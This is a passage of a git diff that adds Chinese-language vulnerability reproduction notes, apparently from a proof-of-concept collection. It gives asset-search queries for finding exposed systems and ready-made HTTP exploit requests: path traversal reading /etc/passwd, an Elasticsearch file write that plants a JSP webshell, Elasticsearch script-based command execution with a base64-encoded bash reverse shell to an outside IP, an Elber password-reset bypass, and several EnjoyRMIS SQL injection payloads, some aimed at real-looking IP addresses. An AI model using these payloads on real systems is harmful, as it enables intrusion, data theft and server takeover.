+# 四、漏洞复现
+```plain
+GET /application/down.php?dw=../../../etc/passwd HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
+Host: 
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1707125276920-4187c6bb-f5ee-46b2-b1bc-8b32f6ab67a7.png](./img/Drmx3enNJaW6hyss/1707125276920-4187c6bb-f5ee-46b2-b1bc-8b32f6ab67a7-888962.png)
+
+
+
+> 更新: 2024-02-29 23:55:41  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xvk2q1dxwph2krte>
\ No newline at end of file
diff --git a/Elasticsearch存在任意文件写入漏洞.md b/Elasticsearch存在任意文件写入漏洞.md
new file mode 100644
index 0000000..aedcdf1
--- /dev/null
+++ b/Elasticsearch存在任意文件写入漏洞.md
@@ -0,0 +1,109 @@
+# Elasticsearch存在任意文件写入漏洞
+
+# 一、漏洞描述
+Elasticsearch向使用者提供执行脚本代码的功能，支持mvel, js,groovy,python,和native语言，默认脚本语言为mvel。Elasticsearch存在任意文件写入漏洞
+
+# 二、影响版本
+Elasticsearch
+
+# 三、资产测绘
+```plain
+app="Elasticsearch"
+```
+
+![1730009233361-9686bf63-9f51-42ac-819e-9bd09b99b929.png](./img/QnkKANvHTfXRP0Kk/1730009233361-9686bf63-9f51-42ac-819e-9bd09b99b929-807804.png)
+
+# 三、漏洞复现
+1、创建一个恶意索引文档
+
+```plain
+POST /a.jsp/a.jsp/1 HTTP/1.1
+Host: 123.58.224.8:32565
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: settingStore=1630480512401_0
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 228
+
+{"<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47,116,101,115,116,46,106,115,112})),new String(new byte[]{114,119})).write(request.getParameter(new String(new byte[]{102})).getBytes());%>":"test"}
+```
+
+![1730010630201-6d1b0034-4b48-4e50-8a3b-631b7d52e123.png](./img/QnkKANvHTfXRP0Kk/1730010630201-6d1b0034-4b48-4e50-8a3b-631b7d52e123-859650.png)
+
+2、再创建一个恶意的存储库，其中location的值即为要写入的路径（需要根据肉鸡的tomcat的www目录来决定）
+
+```plain
+PUT /_snapshot/a.jsp HTTP/1.1
+Host: 123.58.224.8:32565
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: settingStore=1630480512401_0
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 107
+
+{
+"type": "fs",
+"settings": {
+"location": "/usr/local/tomcat/webapps/wwwroot/",
+"compress": false
+}
+}
+```
+
+![1730010641746-77a29c62-63cd-4336-9313-f7deca4e6370.png](./img/QnkKANvHTfXRP0Kk/1730010641746-77a29c62-63cd-4336-9313-f7deca4e6370-688334.png)
+
+3、存储库验证并创建
+
+```plain
+PUT /_snapshot/a.jsp/a.jsp HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: settingStore=1630480512401_0
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 102
+
+{
+     "indices": "a.jsp",
+     "ignore_unavailable": "true",
+     "include_global_state": false
+}
+```
+
+![1730010655294-9e9d90a8-fd4a-4c75-93d0-ef003dc37487.png](./img/QnkKANvHTfXRP0Kk/1730010655294-9e9d90a8-fd4a-4c75-93d0-ef003dc37487-616035.png)
+
+4、写入jsp文件，这个jsp的文件是通过8080来访问的
+
+```plain
+/wwwroot/indices/a.jsp/snapshot-a.jsp?f=success
+```
+
+![1730010687125-d3c494d0-8f7e-4c6c-990f-b97eac530d42.png](./img/QnkKANvHTfXRP0Kk/1730010687125-d3c494d0-8f7e-4c6c-990f-b97eac530d42-084669.png)
+
+5、在www根目录下会生成一个test.jsp的文件，并会成功被写入success
+
+```plain
+/wwwroot/test.jsp
+```
+
+![1730010705354-9724ef91-05da-4b8f-ae5d-41aae14d3c46.png](./img/QnkKANvHTfXRP0Kk/1730010705354-9724ef91-05da-4b8f-ae5d-41aae14d3c46-559091.png)
+
+
+
+> 更新: 2024-11-27 10:04:43  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ktd5oh8xdfle1g4c>
\ No newline at end of file
diff --git a/Elasticsearch存在未授权访问导致的RCE.md b/Elasticsearch存在未授权访问导致的RCE.md
new file mode 100644
index 0000000..a00db72
--- /dev/null
+++ b/Elasticsearch存在未授权访问导致的RCE.md
@@ -0,0 +1,119 @@
+# Elasticsearch存在未授权访问导致的RCE
+
+# 一、漏洞描述
+Elasticsearch向使用者提供执行脚本代码的功能，支持mvel, js,groovy,python,和native语言，默认脚本语言为mvel。由于mvel语言功能较为强大，可以直接执行java代码，而且官方默认没有关闭用户可通过http操控这一功能的接口（script.disable_dynamic），从而导致恶意用户可以通过这个功能远程执行任意Java代码。
+
+# 二、影响版本
+Elasticsearch
+
+# 三、资产测绘
+```plain
+app="Elasticsearch"
+```
+
+![1730009233361-9686bf63-9f51-42ac-819e-9bd09b99b929.png](./img/TxmiYf429ZjwRJZL/1730009233361-9686bf63-9f51-42ac-819e-9bd09b99b929-467988.png)
+
+# 三、漏洞复现
+1、利用该漏洞要求Elasticsearch中有数据，所以先创建一条数据
+
+```plain
+POST /website/blog/ HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 31
+
+{
+    "name": "colleget"
+}
+```
+
+![1730009268228-6be55838-f010-42a4-af81-58585f9a0c3b.png](./img/TxmiYf429ZjwRJZL/1730009268228-6be55838-f010-42a4-af81-58585f9a0c3b-040576.png)
+
+2、执行命令
+
+```plain
+POST /_search?pretty HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 372
+
+{
+    "size": 1,
+    "query": {
+      "filtered": {
+        "query": {
+          "match_all": {
+          }
+        }
+      }
+    },
+    "script_fields": {
+        "command": {
+            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"whoami\").getInputStream()).useDelimiter(\"\\\\A\").next();"
+        }
+    }
+}
+    }
+}
+```
+
+![1730009338548-ecd2b298-f883-4d55-a4f4-f1f9a5899149.png](./img/TxmiYf429ZjwRJZL/1730009338548-ecd2b298-f883-4d55-a4f4-f1f9a5899149-827979.png)
+
+3、反弹shell
+
+```plain
+POST /_search?pretty HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 372
+
+{
+    "size": 1,
+    "query": {
+      "filtered": {
+        "query": {
+          "match_all": {
+          }
+        }
+      }
+    },
+    "script_fields": {
+        "command": {
+            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"bash -c {echo,YmFaaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMxLjcwLzc1MzIgMD4mMQ==}|{base64,-d}|{bash,-i}\").getInputStream()).useDelimiter(\"\\\\A\").next();"
+        }
+    }
+}
+    }
+}
+
+```
+
+![1730009417293-ec63d02a-a5e8-4a7d-b995-fdeec28609ca.png](./img/TxmiYf429ZjwRJZL/1730009417293-ec63d02a-a5e8-4a7d-b995-fdeec28609ca-440486.png)
+
+![1730009433078-7c95d622-3e9c-42d4-b0f8-62007c8a37a9.png](./img/TxmiYf429ZjwRJZL/1730009433078-7c95d622-3e9c-42d4-b0f8-62007c8a37a9-907022.png)
+
+
+
+> 更新: 2024-11-27 10:04:43  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kg7yzqstede6zu7x>
\ No newline at end of file
diff --git a/Elber-Wayber模拟数字音频密码重置漏洞.md b/Elber-Wayber模拟数字音频密码重置漏洞.md
new file mode 100644
index 0000000..bc9dac9
--- /dev/null
+++ b/Elber-Wayber模拟数字音频密码重置漏洞.md
@@ -0,0 +1,23 @@
+# Elber-Wayber模拟数字音频密码重置漏洞
+
+**Elber wavber 模拟/数字音频系统,存在一个严重的 安全漏洞只，该漏洞位于系统的密码重置功能中。攻击者可以通过利用此漏洞。绕过正常的身份验证流程，直接重置用户密码，从而非法获取系统访问权限。一旦攻击者成功重置密码，他们可以登录系统并完全接管控制权，进而窃取敏感数据、篡改系统设置或进行其他恶意操作。** 
+
+## fofa
+
+```javascript
+title="Elber Satellite Equipment" || body="www.elber.it"
+```
+
+## poc
+
+```javascript
+GET /json_data/set_pwd?lev=2&pass=admin1234 HTTP/1.1
+Content-Type: application/json
+Host: 
+```
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502131416179.webp)
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/GnuI11tY3AHG9jEh3J4aDQ
\ No newline at end of file
diff --git a/EnjoyRMISEnjoyRMIS_WS存在目录遍历漏洞.md b/EnjoyRMISEnjoyRMIS_WS存在目录遍历漏洞.md
new file mode 100644
index 0000000..ba31764
--- /dev/null
+++ b/EnjoyRMISEnjoyRMIS_WS存在目录遍历漏洞.md
@@ -0,0 +1,25 @@
+# EnjoyRMIS EnjoyRMIS_WS存在目录遍历漏洞
+
+# 一、漏洞简介
+EnjoyRMIS EnjoyRMIS_WS存在目录遍历漏洞，攻击者可通过该漏洞获取敏感信息。
+
+# 二、影响版本
++ EnjoyRMIS
+
+# 三、资产测绘
++ hunter`web.body="CheckSilverlightInstalled"`
++ 特征
+
+![1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89.png](./img/5qZ8mzexskqycRpJ/1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89-239798.png)
+
+# 四、漏洞复现
+```plain
+/EnjoyRMIS_WS/
+```
+
+![1700643269655-e01879c0-6074-41bd-91ca-a2df4dd47dbe.png](./img/5qZ8mzexskqycRpJ/1700643269655-e01879c0-6074-41bd-91ca-a2df4dd47dbe-453986.png)
+
+
+
+> 更新: 2024-02-29 23:55:45  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tdx6qmg5nrlne2c7>
\ No newline at end of file
diff --git a/EnjoyRMISGetChildGroupSql1存在SQL注入漏洞.md b/EnjoyRMISGetChildGroupSql1存在SQL注入漏洞.md
new file mode 100644
index 0000000..7c37f0c
--- /dev/null
+++ b/EnjoyRMISGetChildGroupSql1存在SQL注入漏洞.md
@@ -0,0 +1,59 @@
+# EnjoyRMIS GetChildGroupSql1存在SQL注入漏洞
+
+# 一、漏洞简介
+EnjoyRMIS GetChildGroupSql1存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息甚至可控制服务器。
+
+# 二、影响版本
++ EnjoyRMIS
+
+# 三、资产测绘
++ hunter`web.body="CheckSilverlightInstalled"`
++ 特征
+
+![1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89.png](./img/jWjV8uVque7i9zbw/1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89-060256.png)
+
+# 四、漏洞复现
+```plain
+POST /EnjoyRMIS_WS/WS/ReportTool/cwsqry.asmx HTTP/1.1
+Host: xx.xx.xx.xx
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+SOAPAction: "http://tempuri.org/GetChildGroupSql1"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <GetChildGroupSql1 xmlns="http://tempuri.org/">
+      <sGuid>1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(select @@version),NULL,NULL-- jhpF</sGuid>
+    </GetChildGroupSql1>
+  </soap:Body>
+</soap:Envelope>
+```
+
+![1700643625811-3b3425fa-909f-411b-8d72-d46fe7c0c397.png](./img/jWjV8uVque7i9zbw/1700643625811-3b3425fa-909f-411b-8d72-d46fe7c0c397-123468.png)
+
+sqlmap
+
+```plain
+POST /EnjoyRMIS_WS/WS/ReportTool/cwsqry.asmx HTTP/1.1
+Host: 120.78.175.218:8008
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+SOAPAction: "http://tempuri.org/GetChildGroupSql1"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <GetChildGroupSql1 xmlns="http://tempuri.org/">
+      <sGuid>1</sGuid>
+    </GetChildGroupSql1>
+  </soap:Body>
+</soap:Envelope>
+```
+
+![1700643507730-28f5a0db-3d0c-40ea-9e13-8c97909a8163.png](./img/jWjV8uVque7i9zbw/1700643507730-28f5a0db-3d0c-40ea-9e13-8c97909a8163-133965.png)
+
+
+
+> 更新: 2024-02-29 23:55:45  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gw589s9zgn0o9yrq>
\ No newline at end of file
diff --git a/EnjoyRMISGetOAById存在SQL注入漏洞.md b/EnjoyRMISGetOAById存在SQL注入漏洞.md
new file mode 100644
index 0000000..c3d7d75
--- /dev/null
+++ b/EnjoyRMISGetOAById存在SQL注入漏洞.md
@@ -0,0 +1,59 @@
+# EnjoyRMIS GetOAById存在SQL注入漏洞
+
+# 一、漏洞简介
+EnjoyRMIS GetOAById存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息甚至可控制服务器。
+
+# 二、影响版本
++ EnjoyRMIS
+
+# 三、资产测绘
++ hunter`web.body="CheckSilverlightInstalled"`
++ 特征
+
+![1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89.png](./img/4X5X0Jwq8Umbb0L0/1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89-537066.png)
+
+# 四、漏洞复现
+```plain
+POST /EnjoyRMIS_WS/WS/POS/cwsoa.asmx HTTP/1.1
+Host: xx.xx.xx.xx
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+SOAPAction: "http://tempuri.org/GetOAById"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <GetOAById xmlns="http://tempuri.org/">
+      <sId>string' AND 8448 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (8448=8448) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(113)+CHAR(113))) AND 'OFyo'='OFyo</sId>
+    </GetOAById>
+  </soap:Body>
+</soap:Envelope>
+```
+
+![1700644019370-8d33a405-91e7-4c16-86af-0b666f3d946e.png](./img/4X5X0Jwq8Umbb0L0/1700644019370-8d33a405-91e7-4c16-86af-0b666f3d946e-534846.png)
+
+sqlmap
+
+```plain
+POST /EnjoyRMIS_WS/WS/POS/cwsoa.asmx HTTP/1.1
+Host: xx.xx.xx.xx
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+SOAPAction: "http://tempuri.org/GetOAById"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <GetOAById xmlns="http://tempuri.org/">
+      <sId>string</sId>
+    </GetOAById>
+  </soap:Body>
+</soap:Envelope>
+```
+
+![1700644052319-929933e6-1c3c-4186-8449-0e4ce469a7f9.png](./img/4X5X0Jwq8Umbb0L0/1700644052319-929933e6-1c3c-4186-8449-0e4ce469a7f9-554815.png)
+
+
+
+> 更新: 2024-02-29 23:55:45  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kqc59tbzda7rl8f6>
\ No newline at end of file
diff --git a/EnjoyRMISGetOCashById存在SQL注入漏洞.md b/EnjoyRMISGetOCashById存在SQL注入漏洞.md
new file mode 100644
index 0000000..9f0927e
--- /dev/null
+++ b/EnjoyRMISGetOCashById存在SQL注入漏洞.md
@@ -0,0 +1,59 @@
+# EnjoyRMIS GetOCashById存在SQL注入漏洞
+
+# 一、漏洞简介
+EnjoyRMIS GetOCashById存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息甚至可控制服务器。
+
+# 二、影响版本
++ EnjoyRMIS
+
+# 三、资产测绘
++ hunter`web.body="CheckSilverlightInstalled"`
++ 特征
+
+![1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89.png](./img/vYTtwPaoO6SfICoc/1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89-467876.png)
+
+# 四、漏洞复现
+```plain
+POST /EnjoyRMIS_WS/WS/POS/cwsoa.asmx HTTP/1.1
+Host: xx.xx.xx.xx
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+SOAPAction: "http://tempuri.org/GetOCashById"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <GetOCashById xmlns="http://tempuri.org/">
+      <sId>string' AND 2187 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (2187=2187) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(118)+CHAR(113))) AND 'uXof'='uXof</sId>
+    </GetOCashById>
+  </soap:Body>
+</soap:Envelope>
+```
+
+![1700644453166-5bba5c8c-2b5d-4e26-b6b6-2d7a657b2f5c.png](./img/vYTtwPaoO6SfICoc/1700644453166-5bba5c8c-2b5d-4e26-b6b6-2d7a657b2f5c-009235.png)
+
+sqlmap
+
+```plain
+POST /EnjoyRMIS_WS/WS/POS/cwsoa.asmx HTTP/1.1
+Host: xx.xx.xx.xx
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+SOAPAction: "http://tempuri.org/GetOCashById"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <GetOCashById xmlns="http://tempuri.org/">
+      <sId>string</sId>
+    </GetOCashById>
+  </soap:Body>
+</soap:Envelope>
+```
+
+![1700644483934-6e89b9f0-7ece-400a-81b5-b7092b2fae79.png](./img/vYTtwPaoO6SfICoc/1700644483934-6e89b9f0-7ece-400a-81b5-b7092b2fae79-412026.png)
+
+
+
+> 更新: 2024-02-29 23:55:45  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/uggmgqbtlqn12ek2>
\ No newline at end of file
diff --git a/EnjoyRMISGetOCgpById存在SQL注入漏洞.md b/EnjoyRMISGetOCgpById存在SQL注入漏洞.md
new file mode 100644
index 0000000..10253db
--- /dev/null
+++ b/EnjoyRMISGetOCgpById存在SQL注入漏洞.md
@@ -0,0 +1,59 @@
+# EnjoyRMIS GetOCgpById存在SQL注入漏洞
+
+# 一、漏洞简介
+EnjoyRMIS GetOCgpById存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息甚至可控制服务器。
+
+# 二、影响版本
++ EnjoyRMIS
+
+# 三、资产测绘
++ hunter`web.body="CheckSilverlightInstalled"`
++ 特征
+
+![1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89.png](./img/GfI4zHk7XLRH5lUG/1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89-108238.png)
+
+# 四、漏洞复现
+```plain
+POST /EnjoyRMIS_WS/WS/POS/cwsoa.asmx HTTP/1.1
+Host: xx.xx.xx.xx
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+SOAPAction: "http://tempuri.org/GetOCgpById"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <GetOCgpById xmlns="http://tempuri.org/">
+      <sId>string' AND 6111 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6111=6111) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(118)+CHAR(113))) AND 'jixc'='jixc</sId>
+    </GetOCgpById>
+  </soap:Body>
+</soap:Envelope>
+```
+
+![1700644680316-9238d3b5-49e4-4ac1-8c7f-48746ef5b248.png](./img/GfI4zHk7XLRH5lUG/1700644680316-9238d3b5-49e4-4ac1-8c7f-48746ef5b248-476359.png)
+
+sqlmap
+
+```plain
+POST /EnjoyRMIS_WS/WS/POS/cwsoa.asmx HTTP/1.1
+Host: xx.xx.xx.xx
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+SOAPAction: "http://tempuri.org/GetOCgpById"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <GetOCgpById xmlns="http://tempuri.org/">
+      <sId>string</sId>
+    </GetOCgpById>
+  </soap:Body>
+</soap:Envelope>
+```
+
+![1700644702977-4c4ea727-688c-4e29-a052-613453b580d4.png](./img/GfI4zHk7XLRH5lUG/1700644702977-4c4ea727-688c-4e29-a052-613453b580d4-478747.png)
+
+
+
+> 更新: 2024-02-29 23:55:45  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fa5hszdx8syeghrc>
\ No newline at end of file
diff --git a/EnjoyRMISGetOCountById存在SQL注入漏洞.md b/EnjoyRMISGetOCountById存在SQL注入漏洞.md
new file mode 100644
index 0000000..c7b7d61
--- /dev/null
+++ b/EnjoyRMISGetOCountById存在SQL注入漏洞.md
@@ -0,0 +1,59 @@
+# EnjoyRMIS GetOCountById存在SQL注入漏洞
+
+# 一、漏洞简介
+EnjoyRMIS GetOCountById存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息甚至可控制服务器。
+
+# 二、影响版本
++ EnjoyRMIS
+
+# 三、资产测绘
++ hunter`web.body="CheckSilverlightInstalled"`
++ 特征
+
+![1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89.png](./img/-3EM53KFP-oCpuOA/1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89-012616.png)
+
+# 四、漏洞复现
+```plain
+POST /EnjoyRMIS_WS/WS/POS/cwsoa.asmx HTTP/1.1
+Host: xx.xx.xx.xx
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+SOAPAction: "http://tempuri.org/GetOCountById"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <GetOCountById xmlns="http://tempuri.org/">
+      <sId>string' AND 8494 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (8494=8494) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113))) AND 'PDAF'='PDAF</sId>
+    </GetOCountById>
+  </soap:Body>
+</soap:Envelope>
+```
+
+![1700644829789-6c2f4976-77e4-48f8-8a32-d8c69fa73016.png](./img/-3EM53KFP-oCpuOA/1700644829789-6c2f4976-77e4-48f8-8a32-d8c69fa73016-290198.png)
+
+sqlmap
+
+```plain
+POST /EnjoyRMIS_WS/WS/POS/cwsoa.asmx HTTP/1.1
+Host: xx.xx.xx.xx
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+SOAPAction: "http://tempuri.org/GetOCountById"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <GetOCountById xmlns="http://tempuri.org/">
+      <sId>string</sId>
+    </GetOCountById>
+  </soap:Body>
+</soap:Envelope>
+```
+
+![1700644943219-a87f98e3-c3f0-4d3a-95f2-5b6d4eae0dac.png](./img/-3EM53KFP-oCpuOA/1700644943219-a87f98e3-c3f0-4d3a-95f2-5b6d4eae0dac-124917.png)
+
+
+
+> 更新: 2024-02-29 23:55:45  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gogy2b6p3055hkci>
\ No newline at end of file
diff --git a/EnjoyRMISGetOCpById存在SQL注入漏洞.md b/EnjoyRMISGetOCpById存在SQL注入漏洞.md
new file mode 100644
index 0000000..c29cfe2
--- /dev/null
+++ b/EnjoyRMISGetOCpById存在SQL注入漏洞.md
@@ -0,0 +1,59 @@
+# EnjoyRMIS GetOCpById存在SQL注入漏洞
+
+# 一、漏洞简介
+EnjoyRMIS GetOCpById存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息甚至可控制服务器。
+
+# 二、影响版本
++ EnjoyRMIS
+
+# 三、资产测绘
++ hunter`web.body="CheckSilverlightInstalled"`
++ 特征
+
+![1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89.png](./img/7G5cfT60yTl1WE3D/1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89-619455.png)
+
+# 四、漏洞复现
+```plain
+POST /EnjoyRMIS_WS/WS/POS/cwsoa.asmx HTTP/1.1
+Host: xx.xx.xx.xx
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+SOAPAction: "http://tempuri.org/GetOCpById"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <GetOCpById xmlns="http://tempuri.org/">
+      <sId>string' AND 9068 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(98)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (9068=9068) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(107)+CHAR(113))) AND 'kNzW'='kNzW</sId>
+    </GetOCpById>
+  </soap:Body>
+</soap:Envelope>
+```
+
+![1700645106150-d7a06c88-1022-40b1-add9-f30ac12c3621.png](./img/7G5cfT60yTl1WE3D/1700645106150-d7a06c88-1022-40b1-add9-f30ac12c3621-126759.png)
+
+sqlmap
+
+```plain
+POST /EnjoyRMIS_WS/WS/POS/cwsoa.asmx HTTP/1.1
